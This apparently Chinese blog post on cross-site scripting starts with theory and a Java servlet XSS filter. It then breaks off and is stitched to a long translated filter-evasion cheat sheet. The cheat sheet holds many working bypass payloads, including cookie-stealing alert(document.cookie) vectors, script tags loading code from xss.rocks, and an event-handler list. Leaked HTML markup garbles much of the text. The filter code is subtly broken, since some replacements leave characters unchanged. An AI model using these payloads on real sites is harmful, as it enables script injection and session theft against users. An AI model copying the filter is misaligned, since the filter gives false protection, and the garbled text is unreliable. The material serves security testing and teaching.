XSS Bypass
1. XSS攻击原理
XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用户访问网页时在其浏览器中进行执行。攻击者通过插入的脚本的执行,来获得用户的信息,比如cookie,发送到攻击者自己的网站(跨站了)。所以称为跨站脚本攻击。XSS可以分为反射型XSS和持久性XSS,还有DOM Based XSS。(一句话,XSS就是在用户的浏览器中执行攻击者自己定制的脚本。)
1.1 反射型XSS
反射性XSS,也就是非持久性XSS。用户点击攻击链接,服务器解析后响应,在返回的响应内容中出现攻击者的XSS代码,被浏览器执行。一来一去,XSS攻击脚本被web server反射回来给浏览器执行,所以称为反射型XSS。
特点:
1> XSS攻击代码非持久性,也就是没有保存在web server中,而是出现在URL地址中;
2> 非持久性,那么攻击方式就不同了。一般是攻击者通过邮件,聊天软件等等方式发送攻击URL,然后用户点击来达到攻击的;
1.2 持久型XSS
区别就是XSS恶意代码存储在web server中,这样,每一个访问特定网页的用户,都会被攻击。
特点:
1> XSS攻击代码存储于web server上;
2> 攻击者,一般是通过网站的留言、评论、博客、日志等等功能(所有能够向web server输入内容的地方),将攻击代码存储到web server上的;
有时持久性XSS和反射型XSS是同时使用的,比如先通过对一个攻击url进行编码(来绕过xss filter),然后提交该web server(存储在web server中), 然后用户在浏览页面时,如果点击该url,就会触发一个XSS攻击。当然用户点击该url时,也可能会触发一个CSRF(Cross site request forgery)攻击。
1.3 DOM based XSS
基于DOM的XSS,也就是web server不参与,仅仅涉及到浏览器的XSS。比如根据用户的输入来动态构造一个DOM节点,如果没有对用户的输入进行过滤,那么也就导致XSS攻击的产生。过滤可以考虑采用esapi4js。
参见:http://www.freebuf.com/articles/web/29177.html , http://www.zhihu.com/question/26628342/answer/33504799
2. XSS 存在的原因
XSS 存在的根本原因是,对URL中的参数,对用户输入提交给web server的内容,没有进行充分的过滤。如果我们能够在web程序中,对用户提交的URL中的参数,和提交的所有内容,进行充分的过滤,将所有的不合法的参数和输入内容过滤掉,那么就不会导致“在用户的浏览器中执行攻击者自己定制的脚本”。
但是,其实充分而完全的过滤,实际上是无法实现的。因为攻击者有各种各样的神奇的,你完全想象不到的方式来绕过服务器端的过滤,最典型的就是对URL和参数进行各种的编码,比如escape, encodeURI, encodeURIComponent, 16进制,10进制,8进制,来绕过XSS过滤。那么我们如何来防御XSS呢?
3. XSS 攻击的防御
XSS防御的总体思路是:对输入(和URL参数)进行过滤,对输出进行编码。
也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击。
3.1 对输入和URL参数进行过滤(白名单和黑名单)
下面贴出一个常用的XSS filter的实现代码:
public class XssFilter implements Filter {
public void init(FilterConfig config) throws ServletException {}
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
throws IOException, ServletException {
XssHttpServletRequestWrapper xssRequest = new XssHttpServletRequestWrapper((HttpServletRequest)request);
chain.doFilter(xssRequest, response);
}
public void destroy() {}
}
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
HttpServletRequest orgRequest = null;
public XssHttpServletRequestWrapper(HttpServletRequest request) {
super(request);
orgRequest = request;
}
/**
* 覆盖getParameter方法,将参数名和参数值都做xss过滤。
* 如果需要获得原始的值,则通过super.getParameterValues(name)来获取
* getParameterNames,getParameterValues和getParameterMap也可能需要覆盖
*/
@Override
public String getParameter(String name) {
String value = super.getParameter(xssEncode(name));
if (value != null) {
value = xssEncode(value);
}
return value;
}
/**
* 覆盖getHeader方法,将参数名和参数值都做xss过滤。
* 如果需要获得原始的值,则通过super.getHeaders(name)来获取
* getHeaderNames 也可能需要覆盖
*/
@Override
public String getHeader(String name) {
String value = super.getHeader(xssEncode(name));
if (value != null) {
value = xssEncode(value);
}
return value;
}
/**
* 将容易引起xss漏洞的半角字符直接替换成全角字符
*
* @param s
* @return
*/
private static String xssEncode(String s) {
if (s == null || s.isEmpty()) {
return s;
}
StringBuilder sb = new StringBuilder(s.length() + 16);
for (int i = 0; i < s.length(); i++) {
char c = s.charAt(i);
switch (c) {
case '>':
sb.append('>');// 全角大于号
break;
case '<':
sb.append('<');// 全角小于号
break;
case '\'':
sb.append('‘');// 全角单引号
break;
case '\"':
sb.append('“');// 全角双引号
break;
case '&':
sb.append('&');// 全角
break;
case '\\':
sb.append('\');// 全角斜线
break;
case '#':
sb.append('#');// 全角井号
break;
case '%': // < 字符的 URL 编码形式表示的 ASCII 字符(十六进制格式) 是: %3c
processUrlEncoder(sb, s, i);
break;
default:
sb.append(c);
break;
}
}
return sb.toString();
}
public static void processUrlEncoder(StringBuilder sb, String s, int index){
if(s.length() >= index + 2){
if(s.charAt(index+1) == '3' && (s.charAt(index+2) == 'c' || s.charAt(index+2) == 'C')){ // %3c, %3C
sb.append('<');
return;
}
if(s.charAt(index+1) == '6' && s.charAt(index+2) == '0'){ // %3c (0x3c=60)
sb.append('<');
return;
}
if(s.charAt(index+1) == '3' && (s.charAt(index+2) == 'e' || s.charAt(index+2) == 'E')){ // %3e, %3E
sb.append('>');
return;
}
if(s.charAt(index+1) == '6' && s.charAt(index+2) == '2'){ // %3e (0x3e=62)
sb.append('>');
return;
}
}
sb.append(s.charAt(index));
}
/**
* 获取最原始的request
*
* @return
*/
public HttpServletRequest getOrgRequest() {
return orgRequest;
}
/**
* 获取最原始的request的静态方法
*
* @return
*/
public static HttpServletRequest getOrgRequest(HttpServletRequest req) {
if (req instanceof XssHttpServletRequestWrapper) {
return ((XssHttpServletRequestWrapper) req).getOrgRequest();
}
return req;
}
}
然后在web.xml中配置该filter:
xssFilter
com.xxxxxx.filter.XssFilter
xssFilter
/*
主要的思路就是将容易导致XSS攻击的边角字符替换成全角字符。< 和 > 是脚本执行和各种html标签需要的,比如 ”>’>
2.2. XSS定位器(短)
如果你没有足够的空间并且知道页面上没有存在漏洞的JavaScript,这个字符串是一个不错的简洁XSS注入检查。注入后查看页面源代码并且寻找是否存在
”;!–”
=&{()}
2.3. 无过滤绕过
这是一个常规的XSS注入代码,虽然通常它会被防御,但是建议首先去测试一下。(引号在任何现代浏览器中都不需要,所以这里省略了它):
2.4. 利用多语言进行过滤绕过
‘”>>”>
</p> <p><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script></p> <p><script>alert(document.cookie)</script>”></p> <p><img/id=”confirm(1)”/alt=”/”src=”/”οnerrοr=eval(id)>’”></p> <p><img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg“></p> </blockquote> <h3>2.5. 通过JavaScript命令实现的图片XSS</h3> <p>图片注入使用JavaScript命令实现(IE7.0 不支持在图片上下文中使用JavaScript 命令,但是可以在其他上下文触发。下面的例子展示了一种其他标签依旧通用的原理):</p> <blockquote> <p><IMG SRC=”javascript:alert(‘XSS’);”></p> </blockquote> <h3>2.6. 无分号无引号</h3> <blockquote> <p><IMG SRC=javascript:alert(‘XSS’)></p> </blockquote> <h3>2.7. 不区分大小写的XSS攻击向量</h3> <blockquote> <p><IMG SRC=JaVaScRiPt:alert(‘XSS’)></p> </blockquote> <h3>2.8. HTML实体</h3> <p>必须有分号才可生效</p> <blockquote> <p><IMG SRC=javascript:alert("XSS")></p> </blockquote> <h3>2.9. 重音符混淆</h3> <p>如果你的JavaScript代码中需要同时使用单引号和双引号,那么可以使用重音符(`)来包含JavaScript 代码。这通常会有很大帮助,因为大部分跨站脚本过滤器都没有过滤这个字符:</p> <blockquote> <p><IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`></p> </blockquote> <h3>2.10. 畸形的A标签</h3> <p>跳过HREF标签找到XSS的重点。。。由DavidCross提交~已在Chrome上验证</p> <blockquote> <p><a οnmοuseοver=”alert(document.cookie)”>xxs link</a></p> </blockquote> <p>此外Chrome经常帮你补全确实的引号。。。如果在这方面遇到问题就直接省略引号,Chrome会帮你补全在URL或脚本中缺少的引号。</p> <blockquote> <p><a οnmοuseοver=alert(document.cookie)>xxs link</a></p> </blockquote> <h3>2.11. 畸形的IMG标签</h3> <p>最初由Begeek发现(短小精湛适用于所有浏览器),这个XSS攻击向量使用了不严格的渲染引擎来构造含有IMG标签并被引号包含的XSS攻击向量。我猜测这种解析原来是为了兼容不规范的编码。这会让它更加难以正确的解析HTML标签:</p> <blockquote> <p><IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”></p> </blockquote> <h3>2.12. fromCharCode函数</h3> <p>如果不允许任何形式的引号,你可以通过执行JavaScript里的fromCharCode函数来创建任何你需要的XSS攻击向量:</p> <blockquote> <p><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></p> </blockquote> <h3>2.13. 使用默认SRC属性绕过SRC域名过滤器</h3> <p>这种方法可以绕过大多数SRC域名过滤器。将JavaScript代码插入事件方法同样适用于注入使用elements的任何HTML标签,例如Form,Iframe, Input, Embed等等。它同样允许将事件替换为任何标签中可用的事件类型,例如onblur,onclick。下面会给出许多不同的可注入事件列表。由David Cross提交,Abdullah Hussam(@Abdulahhusam)编辑。</p> <blockquote> <p><IMG SRC=# οnmοuseοver=”alert(‘xxs’)”></p> </blockquote> <h3>2.14. 使用默认为空的SRC属性</h3> <blockquote> <p><IMG SRC= οnmοuseοver=”alert(‘xxs’)”></p> </blockquote> <h3>2.15. 使用不含SRC属性</h3> <blockquote> <p><IMG οnmοuseοver=”alert(‘xxs’)”></p> </blockquote> <h3>2.16. 通过error事件触发alert</h3> <blockquote> <p><IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img></p> </blockquote> <h3>2.17. 对IMG标签中onerror属性进行编码</h3> <blockquote> <p><img src=x οnerrοr=”javascript:alert('XSS')″></p> </blockquote> <h3>2.18. 十进制HTML字符实体编码</h3> <p>所有在IMG标签里直接使用javascript:形式的XSS示例无法在Firefox或Netscape8.1以上浏览器(使用Gecko渲染引擎)运行。</p> <blockquote> <p><IMG SRC=javascript:alert(</p> <p>'XSS')></p> </blockquote> <h3>2.19. 不带分号的十进制HTML字符实体编码</h3> <p>这对于绕过对“&#XX;”形式的XSS过滤非常有用,因为大多数人不知道最长可使用7位数字。这同样对例如$tmp_string =~s/.*\&#(\d+);.*/$1/;形式的过滤器有效,这种过滤器是错误的认为HTML字符实体编码需要用分号结尾(无意中发现的):</p> <blockquote> <p><IMG SRC=javascript:a&</p> <p>#0000108ert('XSS')></p> </blockquote> <h3>2.20. 不带分号的十六进制HTML字符实体编码</h3> <p>这是有效绕过例如$tmp_string =~ s/.*\&#(\d+);.*/$1/;过滤器的方法。这种过滤器错误的认为#号后会跟着数字(十六进制HTML字符实体编码并非如此)</p> <blockquote> <p><IMG SRC=javascript:alert('XSS')></p> </blockquote> <h3>2.21. 内嵌TAB</h3> <p>使用TAB来分开XSS攻击代码:</p> <blockquote> <p><IMG SRC=”jav ascript:alert(‘XSS’);”></p> </blockquote> <h3>2.22. 内嵌编码后TAB</h3> <p>使用编码后的TAB来分开XSS攻击代码:</p> <blockquote> <p><IMG SRC=”jav	ascript:alert(‘XSS’);”></p> </blockquote> <h3>2.23. 内嵌换行分隔XSS攻击代码</h3> <p>一些网站声称09到13(十进制)的HTML实体字符都可以实现这种攻击,这是不正确的。只有09(TAB),10(换行)和13(回车)有效。查看ASCII字符表获取更多细节。下面几个XSS示例介绍了这些向量。</p> <blockquote> <p><IMG SRC=”jav
ascript:alert(‘XSS’);”></p> </blockquote> <h3>2.24. 内嵌回车分隔XSS攻击代码</h3> <p>注意:上面使用了比实际需要长的字符串是因为0可以忽略。经常可以遇到过滤器解码十六进制和十进制编码时认为只有2到3位字符。实际规则是1至7位字符:</p> <blockquote> <p><IMG SRC=”jav
ascript:alert(‘XSS’);”></p> </blockquote> <h3>2.25. 使用空字符分隔JavaScript指令</h3> <p>空字符同样可以作为XSS攻击向量,但和上面有所区别,你需要使用一些例如Burp工具或在URL字符串里使用%00,亦或你想使用VIM编写自己的注入工具(^V^@会生成空字符),还可以通过程序生成它到一个文本文件。老版本的Opera浏览器(例如Windows版的7.11)还会受另一个字符173(软连字符)的影响。但是空字符%00更加有用并且能帮助绕过真实世界里的过滤器,例如这个例子里的变形:</p> <blockquote> <p>perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out</p> </blockquote> <h3>2.26. 利用IMG标签中JavaScript指令前的空格和元字符</h3> <p>如果过滤器不计算”javascript:”前的空格,这是正确的,因为它们不会被解析,但这点非常有用。因为这会造成错误的假设,就是引号和”javascript:”字样间不能有任何字符。实际情况是你可以插入任何十进制的1至32号字符:</p> <blockquote> <p><IMG SRC=”  javascript:alert(‘XSS’);”></p> </blockquote> <h3>2.27. 利用非字母非数字字符</h3> <p>FireFox的HTML解析器认为HTML关键词后不能有非字母非数字字符,并且认为这是一个空白或在HTML标签后的无效符号。但问题是有的XSS过滤器认为它们要查找的标记会被空白字符分隔。例如”<SCRIPT\s” != “<SCRIPT/XSS\s”:</p> <blockquote> <p><SCRIPT/XSS SRC=”http://xss.rocks/xss.js“></SCRIPT></p> </blockquote> <p>基于上面的原理,可以使用模糊测试进行扩展。Gecko渲染引擎允许任何字符包括字母,数字或特殊字符(例如引号,尖括号等)存在于事件名称和等号之间,这会使得更加容易绕过跨站脚本过滤。注意这同样适用于下面看到的重音符:</p> <blockquote> <p><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)></p> </blockquote> <p>Yair Amit让我注意到了IE和Gecko渲染引擎有一点不同行为,在于是否在HTML标签和参数之间允许一个不含空格的斜杠。这会非常有用如果系统不允许空格的时候。</p> <blockquote> <p><SCRIPT/SRC=”http://xss.rocks/xss.js“></SCRIPT></p> </blockquote> <h3>2.28. 额外的尖括号</h3> <p>由Franz Sedlmaier提交,这个XSS攻击向量可以绕过某些检测引擎,比如先查找第一个匹配的尖括号,然后比较里面的标签内容,而不是使用更有效的算法,例如Boyer-Moore算法就是查找整个字符串中的尖括号和相应标签(当然是通过模糊匹配)。双斜杠注释了额外的尖括号来防止出现JavaScript错误:</p> <blockquote> <p><<SCRIPT>alert(“XSS”);//<</SCRIPT></p> </blockquote> <h3>2.29. 未闭合的script标签</h3> <p>在Firefox和Netscape 8.1的Gecko渲染引擎下你不是必须构造类似“></SCRIPT>”的跨站脚本攻击向量。Firefox假定闭合HTML标签是安全的并且会为你添加闭合标记。多么体贴!不像不影响Firefox的下一个问题,这不需要在后面有额外的HTML标签。如果需要可以添加引号,但通常是没有必要的,需要注意的是,我并不知道这样注入后HTML会什么样子结束:</p> <blockquote> <p><SCRIPT SRC=http://xss.rocks/xss.js?< B ></p> </blockquote> <h3>2.30. script标签中的协议解析</h3> <p>这个特定的变体是由Łukasz Pilorz提交的并且基于Ozh提供的协议解析绕过。这个跨站脚本示例在IE和Netscape的IE渲染模式下有效,如果添加了</SCRIPT>标记在Opera中也可以。这在输入空间有限的情况下是非常有用的,你所使用的域名越短越好。”.j”是可用的,在SCRIPT标签中不需要考虑编码类型因为浏览器会自动识别。</p> <blockquote> <p><SCRIPT SRC=//xss.rocks/.j></p> </blockquote> <h3>2.31. 只含左尖括号的HTML/JavaScript XSS向量</h3> <p>IE渲染引擎不像Firefox,不会向页面中添加额外数据。但它允许在IMG标签中直接使用javascript。这对构造攻击向量是很有用的,因为不需要闭合尖括号。这使得有任何HTML标签都可以进行跨站脚本攻击向量注入。甚至可以不使用”>”闭合标签。注意:这会让HTML页面变得混乱,具体程度取决于下面的HTML标签。这可以绕过以下NIDS正则:/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/因为不需要”>”闭合。另外在实际对抗XSS过滤器的时候,使用一个半开放的<IFRAME标签替代<IMG标签也是非常有效的。</p> <blockquote> <p><IMG SRC=”javascript:alert(‘XSS’)”</p> </blockquote> <p> </p> <h3>2.32. 多个左尖括号</h3> <p> </p> <p> </p> <p>使用一个左尖括号替代右尖括号作为标签结尾的攻击向量会在不同浏览器的Gecko渲染引擎下有不同表现。没有左尖括号时,在Firefox中生效,而在Netscape中无效。</p> <blockquote> <p><iframe src=http://xss.rocks/scriptlet.html <</p> </blockquote> <p> </p> <p> </p> <h3>2.33. JavaScript双重转义</h3> <p> </p> <p> </p> <p>当应用将一些用户输入输出到例如:<SCRIPT>var a=”$ENV{QUERY_STRING}”;</SCRIPT>的JavaScript中时,你想注入你的JavaScript脚本,你可以通过转义转义字符来规避服务器端转义引号。注入后会得到<SCRIPT>vara=”\\”;alert(‘XSS’);//”;</SCRIPT>,这时双引号不会被转义并且可以触发跨站脚本攻击向量。XSS定位器就用了这种方法:</p> <blockquote> <p>\”;alert(‘XSS’);//</p> </blockquote> <p> </p> <p> </p> <p>另一种情况是,如果内嵌数据进行了正确的JSON或JavaScript转义,但没有HTML编码,那可以结束原有脚本块并开始你自己的:</p> <blockquote> <p></script><script>alert(‘XSS’);</script></p> </blockquote> <p> </p> <p> </p> <h3>2.34. 闭合title标签</h3> <p> </p> <p> </p> <p>这是一个简单的闭合<TITLE>标签的XSS攻击向量,可以包含恶意的跨站脚本攻击:</p> <blockquote> <p></TITLE><SCRIPT>alert(“XSS”);</SCRIPT></p> </blockquote> <p> </p> <p> </p> <h3>2.35. INPUT image</h3> <blockquote> <p><INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.36. BODY image</h3> <blockquote> <p><BODY BACKGROUND=”javascript:alert(‘XSS’)”></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.37. IMG Dynsrc</h3> <blockquote> <p><IMG DYNSRC=”javascript:alert(‘XSS’)”></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.38. IMG lowsrc</h3> <blockquote> <p><IMG LOWSRC=”javascript:alert(‘XSS’)”></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.39. List-style-image</h3> <p> </p> <h3> </h3> <p> </p> <p>处理嵌入的图片列表是很麻烦的问题。由于JavaScript指令的原因只能在IE渲染引擎下有效。不是一个特别有用的跨站脚本攻击向量:</p> <blockquote> <p><STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br></p> </blockquote> <p> </p> <p> </p> <h3>2.40. 图片中引用VBscript</h3> <blockquote> <p><IMG SRC=’vbscript:msgbox(“XSS”)’></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.41. Livescript (仅限旧版本Netscape)</h3> <blockquote> <p><IMG SRC=”livescript:[code]"></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.42. SVG对象标签</h3> <blockquote> <p><svg/οnlοad=alert('XSS')></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.43. ECMAScript 6</h3> <blockquote> <p>Set.constructor`alert\x28document.domain\x29```</p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.44. BODY标签</h3> <p> </p> <p> </p> <p>这个方法不需要使用任何例如"javascript:"或"<SCRIPT..."语句来完成XSS攻击。Dan Crowley特别提醒你可以在等号前加入一个空格("οnlοad=" != "onload ="):</p> <blockquote> <p><BODY ONLOAD=alert('XSS')></p> </blockquote> <p> </p> <p> </p> <h3>2.45. 事件处理程序</h3> <p> </p> <p> </p> <p>在XSS攻击中可使用以下事件(在完稿的时候这是网上最全的列表了)。感谢ReneLedosquet的更新。</p> <p> </p> <p> </p> <blockquote> <p>1. FSCommand() (攻击者当需要在嵌入的Flash对象中执行时可以使用此事件)</p> <p> </p> <p>2. onAbort() (当用户中止加载图片时)</p> <p> </p> <p>3. onActivate() (当对象激活时)</p> <p> </p> <p>4. onAfterPrint() (用户打印或进行打印预览后触发)</p> <p> </p> <p>5. onAfterUpdate() (从数据源对象更新数据后由数据对象触发)</p> <p> </p> <p>6. onBeforeActivate() (在对象设置为激活元素前触发)</p> <p> </p> <p>7. onBeforeCopy() (攻击者在选中部分拷贝到剪贴板前执行攻击代码-攻击者可以通过执行execCommand("Copy")函数触发)</p> <p> </p> <p>8. onBeforeCut() (攻击者在选中部分剪切到剪贴板前执行攻击代码)</p> <p> </p> <p>9. onBeforeDeactivate() (在当前对象的激活元素变化前触发)</p> <p> </p> <p>10. onBeforeEditFocus() (在一个包含可编辑元素的对象进入激活状态时或一个可编辑的对象被选中时触发)</p> <p> </p> <p>11. onBeforePaste() (在用户被诱导进行粘贴前或使用execCommand("Paste")函数触发)</p> <p> </p> <p>12. onBeforePrint() (用户需要被诱导进行打印或攻击者可以使用print()或execCommand("Print")函数).</p> <p> </p> <p>13. onBeforeUnload() (用户需要被诱导关闭浏览器-除非从父窗口执行,否则攻击者不能关闭当前窗口)</p> <p> </p> <p>14. onBeforeUpdate() (从数据源对象更新数据前由数据对象触发)</p> <p> </p> <p>15. onBegin() (当元素周期开始时由onbegin 事件立即触发)</p> <p> </p> <p>16. onBlur() (另一个窗口弹出当前窗口失去焦点时触发)</p> <p> </p> <p>17. onBounce() (当marquee对象的behavior属性设置为“alternate”且字幕的滚动内容到达窗口一边时触发)</p> <p> </p> <p>18. onCellChange() (当数据提供者的数据变化时触发)</p> <p> </p> <p>19. onChange() (select,text, 或TEXTAREA字段失去焦点并且值发生变化时触发)</p> <p> </p> <p>20. onClick() (表单中点击触发)</p> <p> </p> <p>21. onContextMenu() (用户需要在攻击区域点击右键)</p> <p> </p> <p>22. onControlSelect() (当用户在一个对象上创建控件选中区时触发)</p> <p> </p> <p>23. onCopy() (用户需要复制一些东西或使用execCommand("Copy")命令时触发)</p> <p> </p> <p>24. onCut() (用户需要剪切一些东西或使用execCommand("Cut")命令时触发)</p> <p> </p> <p>25. onDataAvailable() (用户需要修改元素中的数据,或者由攻击者提供的类似功能)</p> <p> </p> <p>26. onDataSetChanged() (当数据源对象变更导致数据集发生变更时触发)</p> <p> </p> <p>27. onDataSetComplete() (数据源对象中所有数据可用时触发)</p> <p> </p> <p>28. onDblClick() (用户双击一个表单元素或链接)</p> <p> </p> <p>29. onDeactivate() (在激活元素从当前对象转换到父文档中的另一个对象时触发)</p> <p> </p> <p>30. onDrag() (在元素正在拖动时触发)</p> <p> </p> <p>31. onDragEnd() (当用户完成元素的拖动时触发)</p> <p> </p> <p>32. onDragLeave() (用户在拖动元素离开放置目标时触发)</p> <p> </p> <p>33. onDragEnter() (用户将对象拖拽到合法拖曳目标)</p> <p> </p> <p>34. onDragOver() (用户将对象拖拽划过合法拖曳目标)</p> <p> </p> <p>35. onDragDrop() (用户将一个对象(例如文件)拖拽到浏览器窗口)</p> <p> </p> <p>36. onDragStart() (当用户开始拖动元素时触发)</p> <p> </p> <p>37. onDrop() (当拖动元素放置在目标区域时触发)</p> <p> </p> <p>38. onEnded() (在视频/音频(audio/video)播放结束时触发)</p> <p> </p> <p>39. onError() (在加载文档或图像时发生错误)</p> <p> </p> <p>40. onErrorUpdate() (当从数据源对象更新相关数据遇到错误时在数据绑定对象上触发)</p> <p> </p> <p>41. onFilterChange() (当滤镜完成状态变更时触发)</p> <p> </p> <p>42. onFinish() (当marquee完成滚动时攻击者可以执行攻击)</p> <p> </p> <p>43. onFocus() (当窗口获得焦点时攻击者可以执行攻击代码)</p> <p> </p> <p>44. onFocusIn() (当元素将要被设置为焦点之前触发)</p> <p> </p> <p>45. onFocusOut() (攻击者可以在窗口失去焦点时触发攻击代码)</p> <p> </p> <p>46. onHashChange() (当锚部分发生变化时触发攻击代码)</p> <p> </p> <p>47. onHelp() (攻击者可以在用户在当前窗体激活时按下F1触发攻击代码)</p> <p> </p> <p>48. onInput() (在 <input> 或 <textarea> 元素的值发生改变时触发)</p> <p> </p> <p>49. onKeyDown() (用户按下一个键的时候触发)</p> <p> </p> <p>50. onKeyPress() (在键盘按键被按下并释放一个键时触发)</p> <p> </p> <p>51. onKeyUp() (用户释放一个键时触发)</p> <p> </p> <p>52. onLayoutComplete() (用户进行完打印或打印预览时触发)</p> <p> </p> <p>53. onLoad() (攻击者在窗口加载后触发攻击代码)</p> <p> </p> <p>54. onLoseCapture() (可以由releaseCapture()方法触发)</p> <p> </p> <p>55. onMediaComplete() (当一个流媒体文件使用时,这个事件可以在文件播放前触发)</p> <p> </p> <p>56. onMediaError() (当用户在浏览器中打开一个包含媒体文件的页面,出现问题时触发事件)</p> <p> </p> <p>57. onMessage() (当页面收到一个信息时触发事件)</p> <p> </p> <p>58. onMouseDown() (攻击者需要让用户点击一个图片触发事件)</p> <p> </p> <p>59. onMouseEnter() (光标移动到一个对象或区域时触发)</p> <p> </p> <p>60. onMouseLeave() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)</p> <p> </p> <p>61. onMouseMove() (攻击者需要让用户将光标移到一个图片或表格)</p> <p> </p> <p>62. onMouseOut() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)</p> <p> </p> <p>63. onMouseOver() (光标移动到一个对象或区域)</p> <p> </p> <p>64. onMouseUp() (攻击者需要让用户点击一个图片)</p> <p> </p> <p>65. onMouseWheel() (攻击者需要让用户使用他们的鼠标滚轮)</p> <p> </p> <p>66. onMove() (用户或攻击者移动页面时触发)</p> <p> </p> <p>67. onMoveEnd() (用户或攻击者移动页面结束时触发)</p> <p> </p> <p>68. onMoveStart() (用户或攻击者开始移动页面时触发)</p> <p> </p> <p>69. onOffline() (当浏览器从在线模式切换到离线模式时触发)</p> <p> </p> <p>70. onOnline() (当浏览器从离线模式切换到在线模式时触发)</p> <p> </p> <p>71. onOutOfSync() (当元素与当前时间线失去同步时触发)</p> <p> </p> <p>72. onPaste() (用户进行粘贴时或攻击者可以使用execCommand("Paste")函数时触发)</p> <p> </p> <p>73. onPause() (在视频或音频暂停时触发)</p> <p> </p> <p>74. onPopState() (在窗口的浏览历史(history 对象)发生改变时触发)</p> <p> </p> <p>75. onProgress() (攻击者可以在一个FLASH加载时触发事件)</p> <p> </p> <p>76. onPropertyChange() (用户或攻击者需要改变元素属性时触发)</p> <p> </p> <p>77. onReadyStateChange() (每次 readyState 属性变化时被自动调用)</p> <p> </p> <p>78. onRedo() (用户返回上一页面时触发)</p> <p> </p> <p>79. onRepeat() (事件在播放完重复播放时触发)</p> <p> </p> <p>80. onReset() (用户或攻击者重置表单时触发)</p> <p> </p> <p>81. onResize() (用户改变窗口大小时,攻击者可以自动以这种方法触发:<SCRIPT>self.resizeTo(500,400);</SCRIPT>)</p> <p> </p> <p>82. onResizeEnd() (用户完成改变窗体大小时触发)</p> <p> </p> <p>83. onResizeStart() (用户开始改变窗体大小时触发)</p> <p> </p> <p>84. onResume() (当元素继续播放时触发)</p> <p> </p> <p>85. onReverse() (当元素回放时触发)</p> <p> </p> <p>86. onRowsEnter() (用户或攻击者需要改变数据源中的一行)</p> <p> </p> <p>87. onRowExit() (用户或攻击者改变数据源中的一行后退出时触发)</p> <p> </p> <p>88. onRowDelete() (用户或攻击者需要删除数据源中的一行)</p> <p> </p> <p>89. onRowInserted() (user or attacker would needto insert a row in a data source)</p> <p> </p> <p>90. onScroll() (用户需要滚动或攻击者使用scrollBy()函数)</p> <p> </p> <p>91. onSeek() (当用户在元素上执行查找操作时触发)</p> <p> </p> <p>92. onSelect() (用户需要选择一些文本-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)</p> <p> </p> <p>93. onSelectionChange() (当用户选择文本变化时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)</p> <p> </p> <p>94. onSelectStart() (当用户开始选择文本时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)</p> <p> </p> <p>95. onStart() (在marquee 对象开始循环时触发)</p> <p> </p> <p>96. onStop() (当用户按下停止按钮或离开页面时触发)</p> <p> </p> <p>97. onStorage() (当Web Storage更新时触发)</p> <p> </p> <p>98. onSyncRestored() (当元素与它的时间线恢复同步时触发)</p> <p> </p> <p>99. onSubmit() (需要用户或攻击者提交表单)</p> <p> </p> <p>100.onTimeError() (用户或攻击者设置时间属性出现错误时触发)</p> <p> </p> <p>101.onTrackChange() (用户或攻击者改变播放列表内歌曲时触发)</p> <p> </p> <p>102.onUndo() (用户返回上一浏览记录页面时触发)</p> <p> </p> <p>103.onUnload() (用户点击任意链接或按下后退按钮或攻击者强制进行点击时触发)</p> <p> </p> <p>104.onURLFlip() (当一个高级流媒体格式(ASF)文件,由一个HTML+TIME(基于时间交互的多媒体扩展)媒体标签播放时,可触发在ASF文件中内嵌的攻击脚本)</p> <p> </p> <p>105.seekSegmentTime() (这是一个方法可以定位元素某个时间段内中的特定的点,并可以从该点播放。这个段落包含了一个重复的时间线,并包括使用AUTOREVERSE属性进行反向播放。)</p> </blockquote> <p> </p> <h3>2.46. BGSOUND</h3> <blockquote> <p><BGSOUND SRC="javascript:alert('XSS');"></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.47. & JavaScript包含</h3> <blockquote> <p><BR SIZE="&{alert('XSS')}"></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.48. 样式表</h3> <blockquote> <p><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.49. 远程样式表</h3> <p> </p> <h3> </h3> <p> </p> 